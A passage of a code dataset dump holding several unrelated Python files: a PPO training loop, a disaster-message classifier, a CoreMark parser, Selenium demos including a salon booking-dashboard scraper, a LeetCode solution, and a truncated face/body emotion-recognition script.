torch\nimport numpy as np\nimport argparse\nfrom lib.normalization import Normalization, RewardScaling\nfrom lib.replaybuffer import ReplayBuffer,ReplayBufferV2, ReplayBufferV3, ReplayBufferV2_\nfrom agents.hppo_mine import HPPO\nfrom environment import lifecycle_env\nimport torch\nfrom datasets import DataSet\n\nnow_reward = -1000000\n\nclass RewardScaling:\n def __init__(self, shape, gamma):\n self.shape = shape # reward shape=1\n self.gamma = gamma # discount factor\n self.running_ms = RunningMeanStd(shape=self.shape)\n self.R = np.zeros(self.shape)\n\n def __call__(self, x):\n self.R = self.gamma * self.R + x\n self.running_ms.update(self.R)\n x = x / (self.running_ms.std + 1e-8) # Only divided std\n return x\n\n def reset(self): # When an episode is done,we should reset 'self.R'\n self.R = np.zeros(self.shape)\n\nclass Normalization:\n def __init__(self, shape):\n self.running_ms = RunningMeanStd(shape=shape)\n\n def __call__(self, x, update=True):\n # Whether to update the mean and std,during the evaluating,update=Flase\n if update: \n self.running_ms.update(x)\n x = (x - self.running_ms.mean) / (self.running_ms.std + 1e-8)\n\n return x\n \n def save(self, path, te):\n import json\n import os\n\n dict_ = {\n 'n': self.running_ms.n,\n 'mean': self.running_ms.mean.tolist(),\n 'S': self.running_ms.S.tolist(),\n 'std': self.running_ms.std.tolist()\n }\n json.dump(dict_, open(os.path.join(path, \"state_norm_{}.txt\".format(te)), 'w'))\n \n\nclass RunningMeanStd:\n # Dynamically calculate mean and std\n def __init__(self, shape): # shape:the dimension of input data\n self.n = 0\n self.mean = np.zeros(shape)\n self.S = np.zeros(shape)\n self.std = np.sqrt(self.S)\n\n def update(self, x):\n x = np.array(x)\n self.n += 1\n if self.n == 1:\n self.mean = x\n self.std = x\n else:\n old_mean = self.mean.copy()\n self.mean = old_mean + (x - old_mean) / self.n\n self.S = self.S + (x - old_mean) * (x - self.mean)\n self.std = np.sqrt(self.S / self.n)\n\ndef evaluate_policy(args, env, agent, state_norm):\n global now_reward\n times = 500\n evaluate_reward = 0\n mu = 0\n single_re = []\n # infu=0\n for _ in range(times):\n s = env.reset()\n _s = state_norm(s)\n done = False\n re = 0\n episode_reward = 0\n while not done:\n a,p = agent.evalate(_s) # We use the deterministic policy during the evaluating\n if agent.ac_type == 'normal' or agent.ac_type == 'stuT':\n param = (p[a*10:a*10+10]+1)/2\n elif agent.ac_type == 'beta' or agent.ac_type=='gamma':\n param = p[a*10:a*10+10]\n elif agent.ac_type == 'F':\n param = p[a:(a+1)] / 2\n s_, r, done = env.step(s, (a, (param)))\n _s = state_norm(s_)\n episode_reward += r\n mu += param[0]\n # infu += param[1]\n s = s_\n # print(a, r)\n single_re.append(episode_reward)\n evaluate_reward += episode_reward\n if evaluate_reward / times > now_reward:\n agent.save('./models')\n state_norm.save('./models', agent.ac_type)\n now_reward = evaluate_reward / times\n return evaluate_reward / times\n\n\ndef main(args, number, seed):\n env = lifecycle_env(DataSet(), 25, 0,[44.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0], [1.0,65.0,1.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0])\n env_evaluate = lifecycle_env(DataSet(), 25, 0,[44.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0], [1.0,65.0,1.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0,2.0])\n\n np.random.seed(seed)\n torch.manual_seed(seed)\n\n args.state_dim = env.state_dim\n args.action_dim = env.action_dim\n args.param_dim = env.param_dim\n args.max_action = 1\n print(\"env={}\".format('Life Cycle cn'))\n print(\"state_dim={}\".format(args.state_dim))\n print(\"action_dim={}\".format(args.action_dim))\n\n evaluate_num = 0 # Record the number of evaluations\n evaluate_rewards = [] # Record the rewards during the evaluating\n total_steps = 0 # Record the total steps during the training\n device = 0\n replay_buffer = ReplayBufferV2_(args, device)\n agent = HPPO(\n action_dim=env.action_dim,\n state_dim=env.state_dim,\n param_dim=env.param_dim,\n batch_size=args.batch_size,\n mini_batch_size=args.mini_batch_size,\n max_train_steps=args.max_train_steps,\n gamma=args.gamma,\n ac_type=args.distribution_type,\n torch_device=device,\n )\n # reward_scaling = RewardScaling(shape=1, gamma=args.gamma)\n # Build a tensorboard\n # writer = SummaryWriter(log_dir='runs/PPO_discrete/env_{}_number_{}_seed_{}'.format(env_name, number, seed))\n\n state_norm = Normalization(shape=args.state_dim) # Trick 2:state normalization\n\n while total_steps < args.max_train_steps:\n s = env.reset()\n _s = state_norm(s)\n \n episode_steps = 0\n done = False\n # reward_scaling.reset()\n while not done:\n episode_steps += 1\n a, a_logprob, p, p_logprob = agent.choose_action(_s) # Action and the corresponding log probability\n # print(a, p)\n # exit(0)\n # print(p)\n # print(a)\n if agent.ac_type == 'normal' or agent.ac_type == 'stuT':\n param = (p[a*10:a*10+10]+1)/2\n elif agent.ac_type == 'beta' or agent.ac_type=='gamma':\n param = p[a*10:a*10+10]\n elif agent.ac_type == 'F':\n param = (p[a*10:a*10+10]+1)/2\n s_, r, done = env.step(s, (a, param))\n # print(param)\n _s_ = state_norm(s_)\n r_ = r\n # r_ = reward_scaling(r)\n # When dead or win or reaching the max_episode_steps, done will be Ture, we need to distinguish them;\n # dw means dead or win,there is no next state s';\n # but when reaching the max_episode_steps,there is a next state s' actually.\n if done:\n dw = True\n else:\n dw = False\n\n replay_buffer.store(_s, a, a_logprob, p, p_logprob, r_, _s_, dw, done)\n s = s_\n _s = _s_\n total_steps += 1\n # When the number of transitions in buffer reaches batch_size,then update\n if replay_buffer.count == args.batch_size:\n agent.update(replay_buffer, total_steps)\n replay_buffer.count = 0\n\n # Evaluate the policy every 'evaluate_freq' steps\n if total_steps % args.batch_size == 0:\n evaluate_num += 1\n evaluate_reward = evaluate_policy(args, env_evaluate, agent, state_norm)\n evaluate_rewards.append(evaluate_reward)\n print(\"evaluate_num:{} \\t evaluate_reward:{} \\t\".format(evaluate_num, evaluate_reward))\n # Save the rewards\n # if evaluate_num % args.save_freq == 0:\n # np.save('./data_train/PPO_discrete_env_{}_number_{}_seed_{}.npy'.format(env_name, number, seed), np.array(evaluate_rewards))\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\"Hyperparameter Setting for PPO-discrete\")\n parser.add_argument(\"--max_train_steps\", type=int, default=int(3e6), help=\" Maximum number of training steps\")\n parser.add_argument(\"--evaluate_freq\", type=float, default=9e4, help=\"Evaluate the policy every 'evaluate_freq' steps\")\n parser.add_argument(\"--save_freq\", type=int, default=20, help=\"Save frequency\")\n parser.add_argument(\"--batch_size\", type=int, default=4096, help=\"Batch size\")\n parser.add_argument(\"--mini_batch_size\", type=int, default=128, help=\"Minibatch size\")\n parser.add_argument(\"--hidden_width\", type=int, default=256, help=\"The number of neurons in hidden layers of the neural network\")\n parser.add_argument(\"--lr_a\", type=float, default=1e-5, help=\"Learning rate of actor\")\n parser.add_argument(\"--lr_c\", type=float, default=1e-5, help=\"Learning rate of critic\")\n parser.add_argument(\"--gamma\", type=float, default=0.99, help=\"Discount factor\")\n parser.add_argument(\"--lamda\", type=float, default=0.95, help=\"GAE parameter\")\n parser.add_argument(\"--epsilon\", type=float, default=0.1, help=\"PPO clip parameter\")\n parser.add_argument(\"--K_epochs\", type=int, default=10, help=\"PPO parameter\")\n parser.add_argument(\"--use_adv_norm\", type=bool, default=False, help=\"Trick 1:advantage normalization\")\n parser.add_argument(\"--use_state_norm\", type=bool, default=False, help=\"Trick 2:state normalization\")\n parser.add_argument(\"--use_reward_norm\", type=bool, default=False, help=\"Trick 3:reward normalization\")\n parser.add_argument(\"--use_reward_scaling\", type=bool, default=False, help=\"Trick 4:reward scaling\")\n parser.add_argument(\"--entropy_coef\", type=float, default=0.01, help=\"Trick 5: policy entropy\")\n parser.add_argument(\"--use_lr_decay\", type=bool, default=True, help=\"Trick 6:learning rate Decay\")\n parser.add_argument(\"--use_grad_clip\", type=bool, default=True, help=\"Trick 7: Gradient clip\")\n parser.add_argument(\"--use_orthogonal_init\", type=bool, default=True, help=\"Trick 8: orthogonal initialization\")\n parser.add_argument(\"--set_adam_eps\", type=float, default=True, help=\"Trick 9: set Adam epsilon=1e-5\")\n parser.add_argument(\"--use_tanh\", type=float, default=True, help=\"Trick 10: tanh activation function\")\n parser.add_argument(\"--distribution_type\", type=str, default=\"normal\", help=\"the distribution of ppo continue\")\n args = parser.parse_args() \n main(args, number=1, seed=0)","repo_name":"liuchengyiu/lifecycle_CN","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14317854457","text":"import sys\nimport pandas as pd\nfrom sqlalchemy import create_engine\nimport numpy as np\nimport nltk\nnltk.download(['punkt', 'wordnet', 'stopwords'])\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\nfrom sklearn.multioutput import MultiOutputClassifier\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score, make_scorer\nfrom sklearn.decomposition import TruncatedSVD\nimport re\nimport pickle\nimport nltk\nimport warnings\nnltk.download('punkt')\nnltk.download('stopwords')\nwarnings.simplefilter('ignore')\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import classification_report\n\n\ndef load_data(database_filepath):\n \"\"\"\n Load cleaned data from database into dataframe\n Args:\n database_filepath: String. Contains cleaned data table\n table_name: String. Contains cleaned data\n Returns:\n X: numpy.ndarray. Disaster messages\n Y: numpy.ndarray. Disaster categories for each messages\n category_name: list. Disaster category names\n \"\"\"\n # load data from database\n engine = create_engine('sqlite:///' + database_filepath)\n df = pd.read_sql(\"SELECT * FROM MessagesETL\", engine)\n category_names = df.columns[4:]\n X = df['message']\n Y = df.drop(['id', 'message', 'original', 'genre'], axis = 1)\n return X, Y, category_names\n\n\ndef tokenize(text):\n \"\"\"\n Tokenize text (a disaster message).\n Args:\n text: String. A disaster message\n lemmatizer: nltk.stem.Lemmatizer\n Returns:\n tokens: list contains tokens\n \"\"\"\n # Converting everything to lower case\n text = re.sub(r\"[^a-zA-Z0-9]\", \" \", text.lower())\n \n # Tokenize words\n tokens = word_tokenize(text) \n \n # remove stop words\n tokens = [w for w in tokens if w not in stopwords.words(\"english\")] \n \n # Lemmatize\n lemmatizer = WordNetLemmatizer()\n tokens = [lemmatizer.lemmatize(token) for token in tokens] \n \n return tokens\n\n\ndef build_model():\n \"\"\"\n Build model\n Returns:\n pipline: sklearn.model_selection.GridSearchCV. It contains a sklearn estimator.\n \"\"\"\n # Set pipeline\n new_pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer = tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier()))\n ])\n \n # Set parameters for gird search\n parameters = {'tfidf__use_idf': (True, False), \n 'clf__estimator__n_estimators': [10, 20], \n 'clf__estimator__min_samples_split': [2, 4]} \n\n # Set grid search\n cv = GridSearchCV(new_pipeline, param_grid=parameters)\n return cv\n\n\ndef evaluate_model(model, X_test, Y_test, category_names):\n \"\"\"\n Evaluate model\n Args:\n model: sklearn.model_selection.GridSearchCV. It contains a sklearn estimator\n X_test: numpy.ndarray. Disaster messages\n Y_test: numpy.ndarray. Disaster categories for each messages\n category_names: Disaster category names\n Returns:\n None\n \"\"\"\n # Predict categories of messages.\n Y_predictionCV_test = model.predict(X_test)\n \n # Print classification report on test data\n for i, col in enumerate(Y_test):\n print(col)\n print(classification_report(Y_test[col], Y_predictionCV_test[:, i]))\n\ndef save_model(model, model_filepath):\n \"\"\"\n Save model\n Args:\n model: sklearn.model_selection.GridSearchCV. It contains a sklearn estimator.\n model_filepath: String. Trained model is saved as pickel into this file.\n Returns:\n None\n \"\"\"\n with open(model_filepath, 'wb') as f:\n pickle.dump(model, f)\n\n\ndef main():\n if len(sys.argv) == 3:\n database_filepath, model_filepath = sys.argv[1:]\n print('Loading data...\\n DATABASE: {}'.format(database_filepath))\n X, Y, category_names = load_data(database_filepath)\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)\n \n print('Building model...')\n model = build_model()\n \n print('Training model...')\n model.fit(X_train, Y_train)\n \n print('Evaluating model...')\n evaluate_model(model, X_test, Y_test, category_names)\n\n print('Saving model...\\n MODEL: {}'.format(model_filepath))\n save_model(model, model_filepath)\n\n print('Trained model saved!')\n\n else:\n print('Please provide the filepath of the disaster messages database '\\\n 'as the first argument and the filepath of the pickle file to '\\\n 'save the model to as the second argument. \\n\\nExample: python '\\\n 'train_classifier.py ../data/DisasterResponse.db classifier.pkl')\n\n\nif __name__ == '__main__':\n main()","repo_name":"leotomassetti/Disaster-Response-Pipeline","sub_path":"workspace/models/train_classifier.py","file_name":"train_classifier.py","file_ext":"py","file_size_in_byte":5038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10361491272","text":"import sys\n\ndata = sys.stdin.read().split(\"\\n\")\ntotal_ticks = None\niterations = None\n\nfor line in data:\n parts = line.split(\":\", 1)\n if len(parts) == 2:\n key = parts[0].strip()\n value = parts[1].strip()\n if key == \"Total ticks\":\n total_ticks = int(value)\n elif key == \"Iterations\":\n iterations = int(value)\n\nprint(\"{} iterations in {} ticks\".format(iterations, total_ticks))\nprint(\"CoreMark/MHz: {:.2f}\".format(iterations * 1000000 / total_ticks))\n","repo_name":"losfair/Violet","sub_path":"test/parse-coremark-result.py","file_name":"parse-coremark-result.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"53"} +{"seq_id":"29899649912","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver import ActionChains\nimport time\n\n\nclass DragAndDrop():\n\n def test(self):\n baseURL = \"https://jqueryui.com/droppable/\"\n driver = webdriver.Firefox()\n driver.maximize_window()\n driver.get(baseURL)\n driver.implicitly_wait(3)\n\n driver.switch_to.frame(0)\n dragElement = driver.find_element(By.ID, \"draggable\")\n dropElement = driver.find_element(By.ID, \"droppable\")\n\n try:\n actions = ActionChains(driver)\n actions.drag_and_drop(dragElement, dropElement).perform()\n print(\"Drag and drop successful\")\n time.sleep(2)\n except:\n print(\"Drag and drop failed\")\n\n driver.quit()\n\n\nff = DragAndDrop()\nff.test()","repo_name":"bartekh21/mighty-python","sub_path":"actions/DragAndDrop.py","file_name":"DragAndDrop.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27490066339","text":"'''\n\nSuppose an array sorted in ascending order is rotated at some pivot unknown to you beforehand.\n\n(i.e., [0,1,2,4,5,6,7] might become [4,5,6,7,0,1,2]).\nFind the minimum element.\nThe array may contain duplicates.\n\nExample 1:\nInput: [1,3,5]\nOutput: 1\n\nExample 2:\nInput: [2,2,2,0,1]\nOutput: 0\n\nNote:\nThis is a follow up problem to Find Minimum in Rotated Sorted Array.\nWould allow duplicates affect the run-time complexity? How and why?\n\n'''\n\n\n\nclass Solution:\n def findMin(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n # method one\n # return min(nums)\n\n\n\n # method two 二分法难点,在于左右节点和中间结点一样的时候,不知道最小值的区间\n left , right = 0 , len(nums)-1\n while left < right:\n mid = left + (right - left) // 2\n if nums[mid] == nums[right]: # 关键的去重,不能每次舍弃一半的元素,而只能逐个筛选\n right -= 1\n elif nums[mid] < nums[right]:\n right = mid\n else:\n left = mid + 1\n return nums[left]\n","repo_name":"OnlyChristmas/leetcode","sub_path":"Python/find-minimum-in-rotated-sorted-array-ii.py","file_name":"find-minimum-in-rotated-sorted-array-ii.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"31592200556","text":"import json\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport os\n\n\nEMAIL = os.getenv(\"EMAIL\")\nPASSWORD = os.getenv(\"PASSWORD\")\nCHROME_DRIVER_PATH = \"C:\\Work\\Development\\chromedriver.exe\"\n\ntoday_staffs = {}\ntoday_staffs[\"staffs\"] = {}\ntoday_staff = today_staffs[\"staffs\"]\ncounter = 0\n\ndef opening_chrome_window(userUrl):\n\n driver = webdriver.Chrome(executable_path=CHROME_DRIVER_PATH)\n driver.set_window_size(1920,1080)\n driver.get(url=userUrl)\n time.sleep(2)\n return driver\ndef sign_in_to_treatwell():\n email_path = driver.find_element(by=By.XPATH,\n value='//*[@id=\"login-page\"]/div/div[2]/div[1]/form/div[1]/div/div/input')\n password_path = driver.find_element(by=By.XPATH,\n value='//*[@id=\"login-page\"]/div/div[2]/div[1]/form/div[2]/div/div/input')\n email_path.send_keys(EMAIL)\n password_path.send_keys(PASSWORD)\n log_in_btn = driver.find_element(by=By.XPATH, value='//*[@id=\"login-page\"]/div/div[2]/div[1]/form/button')\n log_in_btn.click()\n time.sleep(5)\n\ndef get_date_from_treatwell():\n date = driver.find_element(by=By.XPATH,value='//*[@id=\"calendar-holder\"]/div[2]/div[1]/div[1]/div[3]/div/ul/li[2]/span')\n today_staffs[\"date\"] = date.text\ndef get_all_staffs_name_from_treatwell():\n staff_name_lists = driver.find_elements(by=By.XPATH,value='//*[@id=\"bcalendar-inst\"]/div/div[1]/table/tbody/tr/td')\n for staff in staff_name_lists:\n class_name = staff.get_attribute(\"class\")\n\n if staff.text != ' ':\n if staff.text != '':\n index = int(class_name.split(\" \")[1].split(\"-\")[2])\n split_name_arr = staff.text.split(\"\\n\")\n if(len(split_name_arr)>1):\n staff_name = staff.text.split(\"\\n\")[1]\n today_staff[f\"{index}\"] = {\n \"name\" : staff_name,\n \"bookings\":[]\n }\n else:\n staff_name = staff.text.split(\"\\n\")[0]\n today_staff[f\"{index}\"] = {\n \"name\": staff_name,\n \"bookings\": []\n }\n\ndef saveResultToFile():\n with open(f\"{today_staffs['date']}.json\",\"w\") as data_file:\n json.dump(today_staffs,data_file,indent=4)\n # print(today_staff)\n print(\"Done\")\n# https://connect.treatwell.co.uk/calendar#venue/370180/appointment/day/2022-06-15/199300\n#https://connect.treatwell.co.uk/login?route=%2Fcalendar%23venue%2F370180%2Fappointment%2Fday%2F2022-05-01%2F398937\ndriver = opening_chrome_window(\"https://connect.treatwell.co.uk/calendar#venue/370180/appointment/day/2022-06-29/199300\")\nsign_in_to_treatwell()\nstaff_bookings_lists = driver.find_elements(by=By.XPATH, value='//*[@id=\"bcalendar-inst\"]/div/div[2]/div/table/tbody/tr[2]/td')\nget_date_from_treatwell()\nget_all_staffs_name_from_treatwell()\n\nfor staff_col in staff_bookings_lists:\n bookings = staff_col.find_elements(by=By.CLASS_NAME,value='wc-cal-event')\n if bookings!=[]:\n print(bookings)\n for appointment in bookings:\n if appointment.text != \"\":\n customer_booking_data_list = appointment.text.split(\"\\n\")\n appointment.click()\n time.sleep(2)\n customer_pop_up_treatments_lists = driver.find_elements(by=By.XPATH,value='//*[@id=\"react-root\"]/div/div/div/div[2]/div/div/div[2]/div/div/div[3]/div[1]/div')\n for treatment in customer_pop_up_treatments_lists:\n name = treatment.find_element(by=By.CSS_SELECTOR,value='form > div.appointment--item--content.clearfix > div.js-appointment-data-rows > div > div.appointment--content--item.float.for-max-select.js-employee.right > div > div > div.InputBorder--container--3f2d33 > div > div > div > div')\n if today_staff[f'{counter}'][\"name\"] in name.text:\n customer_booking_dict = {}\n customer_name_obj = treatment.find_element(by=By.XPATH,value='//*[@id=\"react-root\"]/div/div/div/div[2]/div/div/div[1]')\n start_time_obj = treatment.find_element(by=By.CSS_SELECTOR,value='form > div.appointment--item--content.clearfix > div.js-appointment-data-rows > div > div.appointment--content--item.float.for-small-select.no-label.js-startTime.is-react > div > div.InputBorder--container--3f2d33 > div > div > div > div')\n end_time_obj = treatment.find_element(by=By.CSS_SELECTOR,value='form > div.appointment--item--content.clearfix > div.js-appointment-data-rows > div > div.appointment--content--item.clear.extra-padding > span > span')\n customer_booking_dict[\"time\"] = f\"{start_time_obj.text} - {end_time_obj.text}\"\n treatment_type = treatment.find_element(by=By.CSS_SELECTOR,value='form > div.appointment--item--content.clearfix > div.appointment--content--item')\n price = treatment.find_element(by=By.CSS_SELECTOR,value='form > div.appointment--item--footer.clearfix > span > span')\n personOrTreatwellBook = treatment.find_element(by=By.CSS_SELECTOR,value='div > div > div.content-scroll > div.js-appointments.udv-appointments > div > form > div.appointment--source')\n paidOrUnpaid = treatment.find_element(by=By.CSS_SELECTOR,value='form > div.appointment--item--footer.clearfix > span')\n # react-root > div > div > div > div.ui-dialog.dialog2.react-dialog.calendar-item-editor.top > div > div > div:nth-child(3) > div > div > div.content-scroll > div.js-appointments.udv-appointments > div > form > div.appointment--item--footer.clearfix > span\n # react-root > div > div > div > div.ui-dialog.dialog2.react-dialog.calendar-item-editor.top > div > div > div:nth-child(3) > div > div > div.content-scroll > div.js-appointments.udv-appointments > div:nth-child(2) > form > div.appointment--item--footer.clearfix > span\n note_container = treatment.find_element(by=By.CSS_SELECTOR, value='form > div.js-notes.textarea-container')\n customer_booking_dict[\"note\"] = note_container.text\n customer_booking_dict[\"price\"] = price.text.strip(\"£\")\n customer_booking_dict[\"treatment\"] = treatment_type.text.split(\"\\n\")[0]\n customer_booking_dict[\"personOrTreatwellBook\"] = personOrTreatwellBook.text\n customer_booking_dict[\"paidOrUnpaid\"] = paidOrUnpaid.text.replace(\"£\",'')\n try:\n duration_obj = treatment.find_element(by=By.CSS_SELECTOR,value='form > div.appointment--item--content.clearfix > div.appointment--content--item > div.js-skuId.extra-top-margin.is-react > div')\n customer_booking_dict[\"duration\"] = duration_obj.text\n except:\n customer_booking_dict[\"duration\"] = \"Invalid\"\n if customer_booking_dict not in today_staff[f'{counter}']['bookings']:\n today_staff[f'{counter}']['bookings'].append(customer_booking_dict)\n print(f'This is {name.text}')\n close_pop_up_btn = driver.find_element(by=By.XPATH,value='//*[@id=\"react-root\"]/div/div/div/div[2]/div/div/span')\n close_pop_up_btn.click()\n print(today_staff)\n time.sleep(2)\n\n\n counter+=1\n\n#react-root > div > div > div > div.ui-dialog.dialog2.react-dialog.calendar-item-editor.top > div > div > div:nth-child(3) > div > div > div.content-scroll > div.js-appointments.udv-appointments > div > form > div.appointment--source\n#react-root > div > div > div > div.ui-dialog.dialog2.react-dialog.calendar-item-editor.top > div > div > div:nth-child(3) > div > div > div.content-scroll > div.js-appointments.udv-appointments > div > form > div.appointment--source\nsaveResultToFile()\n\n# driver.close()","repo_name":"supawichza40/TreatwellDailySummary","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36698307489","text":"import warnings\nwarnings.filterwarnings(\"ignore\")\n#from apex import amp\nimport numpy as np\nimport torch.utils.data as data\nfrom torchvision import transforms\nimport os, torch\nimport argparse\nfrom dataset_leave_one_out import *\n\nfrom tqdm import trange\nimport wandb\nfrom sklearn.preprocessing import MinMaxScaler\nfrom Networks import * \nimport Networks\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n '''ARM'''\n parser.add_argument('--dataset_path', type=str, default='../datasets/', help='Root dataset path.')\n parser.add_argument('--data_type', type=str, default='GEMEP', help='rafdb or affectnet or ferplus or new_test(the new data you want to test)')\n parser.add_argument('--new_test_path', type=str, default=None, help='New test dataset path.')\n parser.add_argument('--phase', type=str, default='test', help='The phase you want to choose.(default:test or new_test)')\n parser.add_argument('--checkpoint_face', type=str, default='../models/GEMEP_FACE/split1_epoch1_acc0.9139.pth', help='Pytorch checkpoint file path')\n parser.add_argument('-b', '--batch_size', type=int, default=64, help='Batch size.')\n parser.add_argument('--workers', default=1, type=int, help='Number of data loading workers (default: 4)')\n parser.add_argument('-p', '--plot_cm', action='store_true', help='Ploting confusion matrix.')\n parser.add_argument('--mtcnn', action='store_true', help='Using MTCNN to align image.')\n parser.add_argument('--mt_img_path', type=str, default=None, help='Path of the dataset you want to align.')\n parser.add_argument('--mt_save_path', type=str, default=None, help='Path you want to save your dataset.')\n parser.add_argument('--video', action=\"store_true\", help=\"Using MTCNN to align image.\")\n parser.add_argument('--video_path', type=str, default='../datasets/video/', help='Video data path.')\n \n '''Fusing Body'''\n parser.add_argument('--checkpoint_body', type=str, default='../models/GEMEP_BODY/split4_ep59_acc77.27.pth', help='Pytorch checkpoint file path')\n parser.add_argument('--first_layer_size', default=256, type=int)\n parser.add_argument('--num_classes', type=int, default=7)\n parser.add_argument('--confidence_threshold', type=float, default=0.1)\n parser.add_argument('--body_pooling', default=\"avg\", help=\"how to aggregate the body features sequence\")\n parser.add_argument('--db', default=\"babyrobot\")\n\n parser.add_argument('--epochs', type=int, default=200, help='Total training epochs.')\n parser.add_argument('--lr', type=float, default=0.001, help='Initial learning rate for sgd.')\n parser.add_argument('--mode', type=str, default=\"train\")\n\n return parser.parse_args()\n\n\ndef test():\n path_face = '../models/GEMEP_FACE_7/'\n path_body = '../models/GEMEP_BODY_7/'\n path_fc = '../models/GEMEP_FC_7/'\n \n for n in range(1, 11):\n n = 2\n #----------------------Face Model----------------------#\n face_checkpoints = [name for name in os.listdir(path_face)]\n for i, face_checkpoint in enumerate(face_checkpoints):\n if n == int(face_checkpoint.split('_')[0][5:]):\n path_face_checkpoint = os.path.join(path_face,face_checkpoint)\n print(\"Loading face pretrained weights...\", path_face_checkpoint)\n face_model = Networks.ResNet18_ARM___RAF(num_classes=args.num_classes)\n checkpoint_face = torch.load(path_face_checkpoint)\n face_model.load_state_dict(checkpoint_face[\"model_state_dict\"], strict=False)\n face_model = face_model.cuda()\n\n #----------------------Body Model----------------------#\n body_checkpoints = [name for name in os.listdir(path_body)]\n for i, body_checkpoint in enumerate(body_checkpoints):\n if n == int(body_checkpoint.split('_')[0][5:]):\n path_body_checkpoint = os.path.join(path_body,body_checkpoint)\n print(\"Loading body pretrained weights...\", path_body_checkpoint) \n body_model = Networks.BodyFaceEmotionClassifier(args).cuda()\n checkpoint_body = torch.load(path_body_checkpoint)\n body_model.load_state_dict(checkpoint_body[\"model_state_dict\"], strict=False)\n body_model = body_model.cuda()\n\n #----------------------FC Layer----------------------#\n if args.mode == 'train':\n fc_model = Networks.FcLayer(args).cuda()\n fc_model = fc_model.cuda()\n\n # elif args.mode == 'test':\n fc_checkpoints = [name for name in os.listdir(path_fc)]\n for i, fc_checkpoint in enumerate(fc_checkpoints):\n if n == int(fc_checkpoint.split('_')[0][5:]):\n path_fc_checkpoint = os.path.join(path_fc, fc_checkpoint)\n print(\"Loading body pretrained weights...\", path_fc_checkpoint)\n fc_model = Networks.FcLayer(args).cuda()\n checkpoint_fc = torch.load(path_fc_checkpoint)\n fc_model.load_state_dict(checkpoint_fc[\"model_state_dict\"], strict=False)\n fc_model = fc_model.cuda()\n\n CE_criterion = torch.nn.CrossEntropyLoss().cuda()\n optimizer = torch.optim.Adam(params = fc_model.parameters(), weight_decay=1e-2, lr=args.lr)\n scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=30, gamma=0.8)\n\n #----------------------Face Data----------------------#\n # data_type()\n data_transforms = transforms.Compose([transforms.ToPILImage(),\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.558, 0.437, 0.384], std=[0.277, 0.247, 0.241]),\n transforms.RandomErasing(scale=(0.02, 0.1))])\n face_train_dataset = Dataset(args.dataset_path, args.data_type, phase='train', transform=data_transforms, basic_aug=True, data = None, performer_number = n)\n face_train_size = face_train_dataset.__len__()\n print('Face testing size: ', face_train_size, '\\n')\n\n face_train_loader = torch.utils.data.DataLoader(face_train_dataset, batch_size=args.batch_size, num_workers=args.workers, shuffle=False, pin_memory=True)\n\n\n data_transforms_test = transforms.Compose([transforms.ToPILImage(),\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.558, 0.437, 0.384], std=[0.277, 0.247, 0.241])])\n\n face_test_dataset = Dataset(args.dataset_path, args.data_type, phase='val', transform=data_transforms_test, data = None, performer_number=n)\n face_test_size = face_test_dataset.__len__()\n print('Face testing size: ', face_test_size, '\\n')\n\n face_test_loader = torch.utils.data.DataLoader(face_test_dataset,\n batch_size=args.batch_size,\n num_workers=args.workers,\n shuffle=False,\n pin_memory=True)\n\n #----------------------Body Data----------------------#\n body_test_dataset = BodyFaceDataset(args=args, subjects=list(range(0,31)), phase=\"test\", number = n)\n scaler = get_scaler(body_test_dataset)#find the min and max value that will be used later to scale\n body_test_dataset.set_scaler(scaler)#actually scaled the whole data\n body_test_dataset.to_tensors()\n body_test_dataset.prepad()\n body_test_size = body_test_dataset.__len__()\n body_test_loader = torch.utils.data.DataLoader(body_test_dataset, \n batch_size=body_test_size, \n num_workers=args.workers,\n shuffle=False, \n pin_memory=True)\n\n body_train_dataset = BodyFaceDataset(args=args, subjects=list(range(0,31)), phase=\"train\", number = n)\n 